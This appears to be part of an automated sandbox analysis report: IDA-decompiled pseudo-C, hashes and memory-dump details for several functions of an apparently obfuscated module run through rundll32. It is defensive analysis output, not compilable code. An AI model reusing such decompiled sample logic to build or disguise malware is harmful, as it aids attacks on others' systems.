                0x7ffa535f9ba6
                0x7ffa535f9bb3
                0x7ffa535f9bc0
                0x7ffa535f9bd1
                0x7ffa535f9bef
                0x7ffa535f9c03
                0x7ffa535f9c31

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CreateFileFindFirstNamedPipe
                • String ID:
                • API String ID: 2637045871-0
                • Opcode ID: 96c448f786fee3ab4a5cb4a9ce212ff12ab756ea6c6bd8a169a82929cda45701
                • Instruction ID: 463418028934b7bac54ec60e0666ec190a9fb3c8bc6cb0eb84be7bbdcd3a7a3f
                • Opcode Fuzzy Hash: 96c448f786fee3ab4a5cb4a9ce212ff12ab756ea6c6bd8a169a82929cda45701
                • Instruction Fuzzy Hash: 1022F176704B84A7CB4DCB29DA943A9B7A4F389B84F05822ADB6E47760DF34E171C704
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EBD48 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 27%
                			E00007FFA7FFA535EBD48(void* __edx, long long __rbx, long long __rcx, signed long long* __rdx, long long __rdi, long long __rsi, signed int* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, signed int* _a48, intOrPtr _a56) {
				signed int _t145;
				signed int _t149;
				signed int _t153;
				signed int _t157;
				signed char _t166;
				signed int _t179;
				signed int _t215;
				void* _t218;
				signed long long _t237;
				signed long long _t238;
				signed int* _t263;
				signed int* _t264;
				signed int* _t265;
				signed long long _t269;
				signed int* _t272;
				signed int _t276;
				signed int* _t280;
				long _t282;
				void* _t285;

				_t218 = _t285;
				 *((long long*)(_t218 + 0x10)) = __rbx;
				 *((long long*)(_t218 + 0x18)) = __rsi;
				 *((long long*)(_t218 + 0x20)) = __rdi;
				 *((long long*)(_t218 + 8)) = __rcx;
				 *((intOrPtr*)(__rcx + 4)) = 0;
				_a8[2] = 0;
				_a8[3] = 0;
				if ((r8b & 0x00000010) == 0) goto 0x535ebd94;
				_a8[1] = _a8[1] | 0x00000001;
				if ((r8b & 0x00000002) == 0) goto 0x535ebda7;
				_a8[1] = _a8[1] | 0x00000002;
				if ((r8b & 0x00000001) == 0) goto 0x535ebdba;
				_a8[1] = _a8[1] | 0x00000004;
				if ((r8b & 0x00000004) == 0) goto 0x535ebdcd;
				_a8[1] = _a8[1] | 0x00000008;
				if ((r8b & 0x00000008) == 0) goto 0x535ebde0;
				_a8[1] = _a8[1] | 0x00000010;
				_t263 = _a8;
				_t149 = ( !(_t145 << 4) ^  *(_t263 + 8)) & 0x00000010;
				 *(_t263 + 8) =  *(_t263 + 8) ^ _t149;
				_t264 = _a8;
				_t153 = ( !(_t149 << 3) ^  *(_t264 + 8)) & 0x00000008;
				 *(_t264 + 8) =  *(_t264 + 8) ^ _t153;
				_t265 = _a8;
				_t157 = ( !(_t153 << 2) ^  *(_t265 + 8)) & 0x00000004;
				 *(_t265 + 8) =  *(_t265 + 8) ^ _t157;
				_a8[2] = _a8[2] ^ ( !(_t157 + _t157) ^ _a8[2]) & 0x00000002;
				_a8[2] = _a8[2] ^ ( !( *__rdx) ^ _a8[2]) & 0x00000001;
				_t166 = E00007FFA7FFA535EC23C( *__rdx >> 0xb >> 0xc);
				if ((_t166 & 0x00000001) == 0) goto 0x535ebe6c;
				_a8[3] = _a8[3] | 0x00000010;
				if ((_t166 & 0x00000004) == 0) goto 0x535ebe78;
				_t269 = _a8;
				 *(_t269 + 0xc) =  *(_t269 + 0xc) | 0x00000008;
				if ((_t166 & 0x00000008) == 0) goto 0x535ebe84;
				_a8[3] = _a8[3] | 0x00000004;
				if (0 == 0) goto 0x535ebe91;
				_a8[3] = _a8[3] | 0x00000002;
				if (0 == 0) goto 0x535ebe9e;
				_t237 = _a8;
				 *(_t237 + 0xc) =  *(_t237 + 0xc) | 0x00000001;
				_t238 = _t237 & _t269;
				if (0 == 0) goto 0x535ebee8;
				if (_t238 == 0x2000) goto 0x535ebed8;
				if (_t238 == 0x4000) goto 0x535ebec8;
				if (_t238 != _t269) goto 0x535ebeef;
				 *_a8 =  *_a8 | 0x00000003;
				goto 0x535ebeef;
				 *_a8 =  *_a8 & 0xfffffffe;
				 *_a8 =  *_a8 | 0x00000002;
				goto 0x535ebeef;
				 *_a8 =  *_a8 & 0xfffffffd;
				 *_a8 =  *_a8 | 0x00000001;
				goto 0x535ebeef;
				 *_a8 =  *_a8 & 0xfffffffc;
				 *_a8 =  *_a8 & 0xfffe001f;
				 *_a8 =  *_a8 | (r9d & 0x00000fff) << 0x00000005;
				_t280 = _a48;
				_a8[8] = _a8[8] | 0x00000001;
				if (_a56 == 0) goto 0x535ebf4d;
				_a8[8] = _a8[8] & 0xffffffe1;
				_a8[4] =  *_a40;
				_a8[0x18] = _a8[0x18] | 0x00000001;
				_a8[0x18] = _a8[0x18] & 0xffffffe1;
				_a8[0x14] =  *_t280;
				goto 0x535ebf95;
				r8d = 0xffffffe3;
				_a8[8] = _a8[8] & r8d | 0x00000002;
				_a8[4] =  *_a40;
				_a8[0x18] = _a8[0x18] | 0x00000001;
				_a8[0x18] = _a8[0x18] & r8d | 0x00000002;
				_t276 =  *_t280;
				_a8[0x14] = _t276;
				E00007FFA7FFA535EC180(_a8);
				_t122 = _t276 + 1; // 0x1
				r8d = _t122;
				RaiseException(_t282, ??, ??);
				_t272 = _a8;
				if ((_t272[2] & 0x00000010) == 0) goto 0x535ebfbb;
				asm("dec eax");
				if ((_t272[2] & 0x00000008) == 0) goto 0x535ebfc6;
				asm("dec eax");
				if ((_t272[2] & 0x00000004) == 0) goto 0x535ebfd1;
				asm("dec eax");
				if ((_t272[2] & 0x00000002) == 0) goto 0x535ebfdc;
				asm("dec eax");
				_t215 = _t272[2] & 0x00000001;
				if (_t215 == 0) goto 0x535ebfe7;
				asm("dec eax");
				if (_t215 == 0) goto 0x535ec01e;
				if (_t215 == 0) goto 0x535ec012;
				if (_t215 == 0) goto 0x535ec006;
				if (( *_t272 & 0x00000003) != 1) goto 0x535ec025;
				 *__rdx =  *__rdx | 0x00006000;
				goto 0x535ec025;
				asm("dec eax");
				asm("dec eax");
				goto 0x535ec025;
				asm("dec eax");
				asm("dec eax");
				goto 0x535ec025;
				 *__rdx =  *__rdx & 0xffff9fff;
				if (_a56 == 0) goto 0x535ec032;
				_t179 = _t272[0x14];
				 *_t280 = _t179;
				goto 0x535ec039;
				 *_t280 = _t272[0x14];
				return _t179;
			}






















                0x7ffa535ebd48
                0x7ffa535ebd4b
                0x7ffa535ebd4f
                0x7ffa535ebd53
                0x7ffa535ebd57
                0x7ffa535ebd70
                0x7ffa535ebd77
                0x7ffa535ebd7e
                0x7ffa535ebd85
                0x7ffa535ebd90
                0x7ffa535ebd98
                0x7ffa535ebda3
                0x7ffa535ebdab
                0x7ffa535ebdb6
                0x7ffa535ebdbe
                0x7ffa535ebdc9
                0x7ffa535ebdd1
                0x7ffa535ebddc
                0x7ffa535ebde0
                0x7ffa535ebdf3
                0x7ffa535ebdf6
                0x7ffa535ebdf9
                0x7ffa535ebe0c
                0x7ffa535ebe0f
                0x7ffa535ebe12
                0x7ffa535ebe25
                0x7ffa535ebe28
                0x7ffa535ebe40
                0x7ffa535ebe55
                0x7ffa535ebe58
                0x7ffa535ebe62
                0x7ffa535ebe68
                0x7ffa535ebe6e
                0x7ffa535ebe70
                0x7ffa535ebe74
                0x7ffa535ebe7a
                0x7ffa535ebe80
                0x7ffa535ebe87
                0x7ffa535ebe8d
                0x7ffa535ebe94
                0x7ffa535ebe96
                0x7ffa535ebe9a
                0x7ffa535ebea5
                0x7ffa535ebea8
                0x7ffa535ebeb0
                0x7ffa535ebeb8
                0x7ffa535ebebd
                0x7ffa535ebec3
                0x7ffa535ebec6
                0x7ffa535ebecc
                0x7ffa535ebed3
                0x7ffa535ebed6
                0x7ffa535ebedc
                0x7ffa535ebee3
                0x7ffa535ebee6
                0x7ffa535ebeec
                0x7ffa535ebefc
                0x7ffa535ebf06
                0x7ffa535ebf0c
                0x7ffa535ebf10
                0x7ffa535ebf18
                0x7ffa535ebf23
                0x7ffa535ebf30
                0x7ffa535ebf37
                0x7ffa535ebf3f
                0x7ffa535ebf48
                0x7ffa535ebf4b
                0x7ffa535ebf51
                0x7ffa535ebf60
                0x7ffa535ebf6e
                0x7ffa535ebf76
                0x7ffa535ebf87
                0x7ffa535ebf8e
                0x7ffa535ebf91
                0x7ffa535ebf95
                0x7ffa535ebfa2
                0x7ffa535ebfa2
                0x7ffa535ebfa6
                0x7ffa535ebfac
                0x7ffa535ebfb4
                0x7ffa535ebfb6
                0x7ffa535ebfbf
                0x7ffa535ebfc1
                0x7ffa535ebfca
                0x7ffa535ebfcc
                0x7ffa535ebfd5
                0x7ffa535ebfd7
                0x7ffa535ebfdc
                0x7ffa535ebfe0
                0x7ffa535ebfe2
                0x7ffa535ebfec
                0x7ffa535ebff1
                0x7ffa535ebff6
                0x7ffa535ebffb
                0x7ffa535ebffd
                0x7ffa535ec004
                0x7ffa535ec006
                0x7ffa535ec00b
                0x7ffa535ec010
                0x7ffa535ec012
                0x7ffa535ec017
                0x7ffa535ec01c
                0x7ffa535ec01e
                0x7ffa535ec029
                0x7ffa535ec02b
                0x7ffa535ec02e
                0x7ffa535ec030
                0x7ffa535ec036
                0x7ffa535ec04d

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ExceptionRaise_clrfp
                • String ID:
                • API String ID: 15204871-0
                • Opcode ID: 1ac256271ec7e779de7012907d652dde8f9598f36a7378bd05bc035ebf56baba
                • Instruction ID: 5ebaa9ed102033b12d794667b787d37211e9b8a39d9564af0ce6c90eb56673cb
                • Opcode Fuzzy Hash: 1ac256271ec7e779de7012907d652dde8f9598f36a7378bd05bc035ebf56baba
                • Instruction Fuzzy Hash: E1B18A73624B888EEB19CF29C84636C3BA1FB85B48F19D861DB6D837A4CB39D451C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F8C00 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 56%
                			E00007FFA7FFA535F8C00(void* __ecx, void* __ebp, long long __rbx, void* __rdx, long long __rsi, void* __r8, void* __r9, void* __r10) {
				signed int _t96;
				signed int _t120;
				signed int _t125;
				signed long long _t135;
				signed long long _t139;
				intOrPtr _t167;
				void* _t169;
				signed long long _t186;
				signed long long _t189;
				void* _t190;
				long long _t194;
				void* _t196;
				void* _t197;
				signed long long _t200;
				signed int _t203;
				void* _t205;
				struct _CRITICAL_SECTION* _t209;
				void* _t211;

				 *((long long*)(_t196 + 8)) = __rbx;
				 *((long long*)(_t196 + 0x10)) = _t194;
				 *((long long*)(_t196 + 0x18)) = __rsi;
				_push(_t190);
				_t197 = _t196 - 0x20;
				r11d =  *((intOrPtr*)(_t197 + 0x70));
				r15d = __rdx - 0x1ad7;
				r14d =  *((intOrPtr*)(_t197 + 0x80));
				r9d = __rdx - 0x4da;
				r13d =  *(_t197 + 0x98);
				_t120 = __r8 + 8;
				_t167 =  *((intOrPtr*)(_t197 + 0x88));
				r11d = r11d + 0x3d9;
				r10d = _t169 + 0x83;
				r14d = r14d + 0xffffe9db;
				r13d = r13d + 0xfffff6aa;
				if (r11d == __r8 + 0x83) goto 0x535f8eda;
				if (r13d - __r9 - 0xe8 > 0) goto 0x535f8d88;
				_t96 = _t190 + 0x7b;
				if (r9d != _t96) goto 0x535f8d28;
				r14d = r14d + 0xf31;
				 *((intOrPtr*)(_t167 + 0x600)) = 0x11aab8;
				_t125 = _t169 + 0x62d - 0x720;
				 *(_t167 + 0x458) = _t96 / ( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x2a0)) + 0x68)) - 0x157e);
				 *((intOrPtr*)(_t167 + 0x604)) = 0x144;
				 *((intOrPtr*)(_t167 + 0x608)) = 2;
				 *((intOrPtr*)(_t167 + 0x60c)) = 1;
				 *((intOrPtr*)(_t167 + 0x610)) = 0x375c;
				_t135 =  *((intOrPtr*)(_t167 + 0x20));
				 *((long long*)(_t167 + 8)) = 0x390b;
				 *((long long*)(_t135 + 0x470)) = 0x2839;
				goto 0x535f8eda;
				_t186 = _t120;
				 *(_t167 + 0x110) =  *(_t167 + 0x110) | _t135;
				 *(_t167 + 0x128) =  *(_t167 + 0x128) * ((r10d ^ _t186) -  *((intOrPtr*)(_t167 + 0x5e0)));
				_t139 =  *(_t167 + 0x158) ^ _t186;
				 *(_t167 + 0x108) =  *(_t167 + 0x108) - _t139;
				FindNextFileA(_t211);
				InitializeCriticalSection(_t209);
				 *(_t167 + 0x4b8) =  *(_t167 + 0x4b8) ^ _t139;
				goto 0x535f8eda;
				_t205 = r15d;
				if (_t205 - ( *(_t167 + 0x398) &  *(_t167 + 0x40)) *  *(_t167 + 0x70) < 0) goto 0x535f8eda;
				_t203 = r9d;
				if ( *((intOrPtr*)(_t167 + 0x370)) != _t203) goto 0x535f8ec0;
				_t200 = r14d;
				 *(_t167 + 0x108) =  *(_t167 + 0x108) ^  *((intOrPtr*)(_t167 + 0x410)) -  *((intOrPtr*)(_t167 + 0x80)) ^ _t200;
				_t189 = ( *(_t167 + 0x110) * 0x000011f1 ^  *(_t167 + 0x3a0)) * (_t190 + 0x1582);
				 *(_t167 + 0x3a0) = _t189;
				 *(_t167 + 0xa0) =  *(_t167 + 0xa0) | ( *((intOrPtr*)(_t167 + 0x338)) + _t203) * _t189;
				 *(_t167 + 0x3c0) =  *(_t167 + 0x3c0) |  *(_t167 + 0x480) ^  *(_t167 + 0xb0) ^ _t200;
				 *(_t167 + 0x240) =  *(_t167 + 0x240) ^ (r13d | 0x0000145c |  *(_t167 + 0x40));
				 *(_t167 + 0x148) =  *(_t167 + 0x148) * (__r10 + 0x1355 + ( *(_t167 + 0x378) ^ r9d ^ 0x00000bbb) * (__rsi + _t194) -  *((intOrPtr*)(_t167 + 0x250)));
				 *((intOrPtr*)(_t167 + 0x2e0)) =  *((intOrPtr*)(_t167 + 0x2e0)) + ( *((intOrPtr*)(_t167 + 0xd0)) - 0x00001ba7 &  *(_t167 + 0x4b0));
				 *(_t167 + 0x1d0) =  *(_t167 + 0x1d0) ^ ( *(_t167 + 0x230) & _t125) + _t205;
				 *(_t167 + 0xc8) =  *(_t167 + 0xc8) * ( *(_t167 + 0x238) | _t200);
				goto 0x535f8eda;
				 *((intOrPtr*)(_t167 + 0xd0)) =  *((intOrPtr*)(_t167 + 0xd0)) +  *((intOrPtr*)(_t167 + 0x80)) - (_t120 & r10d);
				if (_t125 != _t211 + 0x1487) goto 0x535f8f0a;
				 *((intOrPtr*)(_t167 + 0x614)) = 0x10f9e;
				if (_t209 - 0x22d == __rsi - 0x13a) goto 0x535f8f0a;
				 *((intOrPtr*)(_t167 + 0x618)) = 0xb;
				return _t190 - 0x19;
			}





















                0x7ffa535f8c00
                0x7ffa535f8c05
                0x7ffa535f8c0a
                0x7ffa535f8c0f
                0x7ffa535f8c18
                0x7ffa535f8c2a
                0x7ffa535f8c2f
                0x7ffa535f8c36
                0x7ffa535f8c3e
                0x7ffa535f8c45
                0x7ffa535f8c4d
                0x7ffa535f8c51
                0x7ffa535f8c5f
                0x7ffa535f8c66
                0x7ffa535f8c6d
                0x7ffa535f8c7a
                0x7ffa535f8c84
                0x7ffa535f8c94
                0x7ffa535f8c9a
                0x7ffa535f8ca0
                0x7ffa535f8cb5
                0x7ffa535f8cce
                0x7ffa535f8cd8
                0x7ffa535f8cde
                0x7ffa535f8ce4
                0x7ffa535f8cee
                0x7ffa535f8cf8
                0x7ffa535f8d02
                0x7ffa535f8d0c
                0x7ffa535f8d10
                0x7ffa535f8d18
                0x7ffa535f8d23
                0x7ffa535f8d2b
                0x7ffa535f8d36
                0x7ffa535f8d52
                0x7ffa535f8d60
                0x7ffa535f8d63
                0x7ffa535f8d6a
                0x7ffa535f8d70
                0x7ffa535f8d7c
                0x7ffa535f8d83
                0x7ffa535f8d98
                0x7ffa535f8d9e
                0x7ffa535f8da4
                0x7ffa535f8dae
                0x7ffa535f8dd4
                0x7ffa535f8dda
                0x7ffa535f8df4
                0x7ffa535f8e05
                0x7ffa535f8e0c
                0x7ffa535f8e2a
                0x7ffa535f8e3e
                0x7ffa535f8e70
                0x7ffa535f8e8b
                0x7ffa535f8ea2
                0x7ffa535f8eb7
                0x7ffa535f8ebe
                0x7ffa535f8ed3
                0x7ffa535f8ee3
                0x7ffa535f8eec
                0x7ffa535f8efe
                0x7ffa535f8f00
                0x7ffa535f8f29

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CriticalFileFindInitializeNextSection
                • String ID:
                • API String ID: 1152700987-0
                • Opcode ID: 33d821c9519403da0d6fd2cd1bd47c6fad23d7059bad394a0bec873c92478540
                • Instruction ID: 88fff150171db728ac913b517a5de528ee4dc3909f97fb835b49a95d93dd9a28
                • Opcode Fuzzy Hash: 33d821c9519403da0d6fd2cd1bd47c6fad23d7059bad394a0bec873c92478540
                • Instruction Fuzzy Hash: DF712473615B848ADB54CF24D4953AA33A9F784B4CF099036CE4E9A358EF78E295C710
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F84F0 Relevance: 2.8, APIs: 2, Instructions: 330COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 90%
                			E00007FFA7FFA535F84F0(void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, long long __rbx, long long __rsi, signed int __r8, void* __r9) {
				void* __rdi;
				void* _t282;
				long long _t284;
				intOrPtr _t290;
				signed int _t330;
				signed long long _t340;
				signed long long _t342;
				void* _t344;
				void* _t374;
				signed long long _t385;
				signed long long _t387;
				signed long long _t391;
				signed long long _t394;
				long long _t399;
				signed int _t400;
				void* _t402;
				void* _t403;
				signed long long _t416;
				struct _CRITICAL_SECTION* _t427;
				long long* _t428;
				signed long long _t430;
				struct _CRITICAL_SECTION* _t432;
				void* _t434;
				signed long long _t435;
				void* _t437;
				intOrPtr* _t438;

				_t396 = __rsi;
				_t282 = _t402;
				 *((long long*)(_t282 + 8)) = __rbx;
				 *((long long*)(_t282 + 0x10)) = _t399;
				 *((long long*)(_t282 + 0x18)) = __rsi;
				 *(_t282 + 0x20) = r9d;
				_t403 = _t402 - 0x70;
				r9d = r9d + 0x6c3;
				_t400 = __r8;
				r10d =  *(_t403 + 0xc0);
				 *((intOrPtr*)(_t403 + 0xe8)) =  *((intOrPtr*)(_t403 + 0xe8)) + 0xfffff9e0;
				r12d = _t282 - 0x1ad7;
				 *(_t403 + 0x50) = r12d;
				 *((intOrPtr*)(_t403 + 0x58)) =  *(_t403 + 0xf0) + 0xfffff71a;
				r8d = _t374 + 0x4f3;
				r15d = _t344 - 0x1ec0;
				r10d = r10d + 0xffffeaeb;
				 *(_t403 + 0x54) = r9d;
				 *(_t403 + 0xf0) = r8d;
				r13d = _t344 - 0xc13;
				 *(_t403 + 0xd8) = r10d;
				r14d = _t282 + 0x9c9;
				 *(_t403 + 0xd0) = r14d;
				 *(_t403 + 0xc0) =  *(_t403 + 0xe0) + 0xfffff9e5;
				if ( *((intOrPtr*)(_t403 + 0xc8)) - r9d <= 0) goto 0x535f8bdb;
				if (r14d -  *(_t403 + 0xd0) <= 0) goto 0x535f8bdb;
				if (r8d - _t432 + 0x89a > 0) goto 0x535f88c3;
				_t284 =  *((intOrPtr*)(__r8 + 0x468));
				 *((intOrPtr*)(_t284 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x148)) + 0x610e;
				 *((intOrPtr*)(__r8 + 0x3e0))();
				 *((long long*)(__r8 + 0x3d8)) = _t284;
				r13d = 0x1352;
				 *( *((intOrPtr*)(__r8 + 0x240)) + 0x450) =  *( *((intOrPtr*)(__r8 + 0x240)) + 0x450) * ( *((intOrPtr*)(__r8 + 0x5f8)) + 0x181f);
				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x3c8)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x3c8)) - ( *( *((intOrPtr*)(__r8 + 0x2a0)) + 0x230) ^ 0x00001320);
				 *((long long*)( *((intOrPtr*)(__r8 + 0x5e8)) + 0xa8)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x90)) + 0xbbb;
				_t290 =  *((intOrPtr*)(__r8 + 0x358));
				if ( *((intOrPtr*)(_t290 + 0x148)) == _t432) goto 0x535f8881;
				_t48 = _t400 + 0x280; // 0x15d2
				_t438 = _t48;
				_t49 = _t400 + 0x25a; // 0x15ac
				_t428 = _t49;
				r8d = 0;
				_t340 = __r8 * 0xd;
				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x390)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x390)) + _t290 -  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x190));
				 *( *((intOrPtr*)(__r8 + 0x108)) + 0x28) =  *( *((intOrPtr*)(__r8 + 0x108)) + 0x28) |  *( *((intOrPtr*)(__r8 + 0x358)) + 0x358) ^ 0x00001582;
				 *( *((intOrPtr*)(__r8 + 0x108)) + 0x1d0) =  *( *((intOrPtr*)(__r8 + 0x108)) + 0x1d0) |  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x318)) - 0x0000181f;
				 *(_t428 - 2) =  *( *((intOrPtr*)(__r8 + 0x2a0)) + 0x1b0) ^ 0x0000a493;
				 *(( *(__r8 + 0x1b0) ^ 0x00001fd3) + 0xfffffda6 + _t428 + __r8 + 0x258) =  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x68) ^ 0xe3ff5482;
				 *_t428 =  *((intOrPtr*)(_t438 + 0x30));
				 *( *((intOrPtr*)(__r8 + 0x20)) + 0x128) =  *( *((intOrPtr*)(__r8 + 0x20)) + 0x128) * 0x15fd;
				_t76 = _t400 + 0x204; // 0x1556
				E00007FFA7FFA535E3B00( *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x68) ^ 0xe3ff5482, __edi, 0, __esp, _t76 + _t340,  *_t438, 0xfffffda6 - __r8, __rsi,  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x148) ^ 0x00001358);
				r9d = 0x16ce;
				r8d = 0x10ae;
				 *( *((intOrPtr*)(__r8 + 0x358)) + 0x470) =  *( *((intOrPtr*)(__r8 + 0x358)) + 0x470) ^  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x140);
				 *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x140) =  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x140) - 1;
				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x230)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x230)) -  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x108)) + 0x178));
				 *((long long*)( *((intOrPtr*)(__r8 + 0x108)) + 0x178)) =  *((long long*)( *((intOrPtr*)(__r8 + 0x108)) + 0x178)) + 1;
				_t95 = _t400 + 0x258; // 0x15aa
				 *(_t403 + 0x28) = _t95 + _t340;
				 *(_t403 + 0x20) =  *_t438;
				E00007FFA7FFA535E1000( *_t438, __r8, _t396, _t437, _t434);
				 *( *((intOrPtr*)(_t400 + 0x160)) + 0x3a0) =  *( *((intOrPtr*)(_t400 + 0x5e8)) + 0x190) ^ 0x000012ad;
				 *( *((intOrPtr*)(_t400 + 0x5e8)) + 0x360) =  *( *((intOrPtr*)(_t400 + 0x5e8)) + 0x360) ^  *(_t400 + 0x298) + 0x00002114;
				if (1 -  *((intOrPtr*)( *(_t400 + 0x358) + 0x148)) - _t432 < 0) goto 0x535f86b0;
				 *((intOrPtr*)( *((intOrPtr*)(_t400 + 0x468)))) =  *((intOrPtr*)( *((intOrPtr*)(_t400 + 0x110)) + 0x70)) + 0x70694fe0;
				r14d = r14d - 0x19f;
				 *((intOrPtr*)( *((intOrPtr*)(_t400 + 0x468)) + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t400 + 0x5e8)) + 0x148)) + 0x2e736217;
				goto 0x535f8bdb;
				if (r12d - (r15d | r12d) < 0) goto 0x535f8b74;
				_t391 =  *((intOrPtr*)(_t400 + 0x488));
				_t385 =  *(_t400 + 0x450) & _t391 | 0x0000145c;
				if ( *((intOrPtr*)(_t400 + 0x240)) != _t385) goto 0x535f89ad;
				 *((long long*)(_t403 + 0x60)) =  *((intOrPtr*)(_t400 + 0x110)) +  *((intOrPtr*)(_t400 + 0x5e0));
				 *((long long*)(_t403 + 0x68)) = (r10d |  *(_t400 + 0x1b0)) + 0xffffdeec;
				_t435 =  *((intOrPtr*)(_t403 + 0x68));
				_t430 =  *((intOrPtr*)(_t403 + 0x60));
				_t342 = r13d | r12d;
				r8d = r8d + 2;
				r15d = r15d - ( *(_t400 + 0x140) + 0x00001320 & r15d);
				if (r8d == _t385) goto 0x535f8964;
				r14d =  *(_t403 + 0xd0);
				r12d =  *(_t403 + 0x50);
				 *(_t400 + 0x358) =  *(_t400 + 0x358) ^ _t430;
				 *(_t400 + 0x5d8) =  *(_t400 + 0x5d8) * _t435;
				 *(_t400 + 0x1a8) =  *(_t400 + 0x1a8) + _t342;
				 *(_t400 + 0x398) =  *(_t400 + 0x248) * 0x1320;
				r10d = r14d;
				r11d =  *(_t400 + 0x2a0);
				r13d = r13d |  *((intOrPtr*)(_t400 + 0x188)) - 0x00000c92;
				r9d =  *(_t400 + 0x3a0);
				_t146 = _t342 + 0xf15; // 0x13b2
				r11d = r11d | _t146;
				r10d = r10d &  *(_t403 + 0xd8);
				r9d = r9d - 0x157a;
				r9d = r9d |  *(_t400 + 0x68);
				 *(_t400 + 0x350) =  *(_t400 + 0x350) ^ (_t391 -  *((intOrPtr*)(_t400 + 0x2a8)) |  *(_t403 + 0xf0));
				 *(_t403 + 0x28) = r11d;
				 *(_t403 + 0x20) = r10d;
				EnterCriticalSection(_t432);
				r10d = _t435 + _t430;
				r11d =  *(_t400 + 0x70);
				r11d = r11d +  *(_t400 + 0x358);
				r8d =  *(_t400 + 0x2c8);
				r9d =  *(_t403 + 0xe0);
				r8d = r8d + 0x1320;
				r10d = r10d |  *(_t400 + 0x140);
				r9d = r9d + 0x421;
				 *(_t403 + 0x40) = r8d;
				_t394 =  *(_t403 + 0xb8);
				r8d = 0;
				 *(_t403 + 0x38) = r10d;
				r11d = r11d * r12d;
				 *(_t400 + 0x108) =  *(_t400 + 0x108) | r12d ^ 0x00001515;
				_t330 = _t394 -  *((intOrPtr*)(_t400 + 0x5e8));
				 *(_t400 + 0x1a8) = _t330;
				 *(_t403 + 0x30) = r11d;
				r9d = r9d +  *(_t403 + 0xd8) +  *((intOrPtr*)(_t400 + 0x3b8)) -  *(_t403 + 0xc0) - r14d;
				 *(_t403 + 0x28) =  *(_t400 + 0x3c8) ^  *(_t400 + 0x298) | 0x00001ba7;
				 *(_t403 + 0x20) = r9d;
				E00007FFA7FFA535F6E94( *(_t400 + 0x3c8) ^  *(_t400 + 0x298) | 0x00001ba7,  *(_t403 + 0x54) & 0x0000181f,  *((intOrPtr*)(_t400 + 0x1d0)) +  *(_t403 + 0xf0) ^  *(_t403 + 0xb8), _t342,  *((intOrPtr*)(_t403 + 0xc8)) + 0xbbb +  *((intOrPtr*)(_t400 + 0x3c0)), _t385,  *(_t403 + 0xc0) *  *(_t403 + 0xb8), _t400,  *(_t400 + 0x5d8) * _t435);
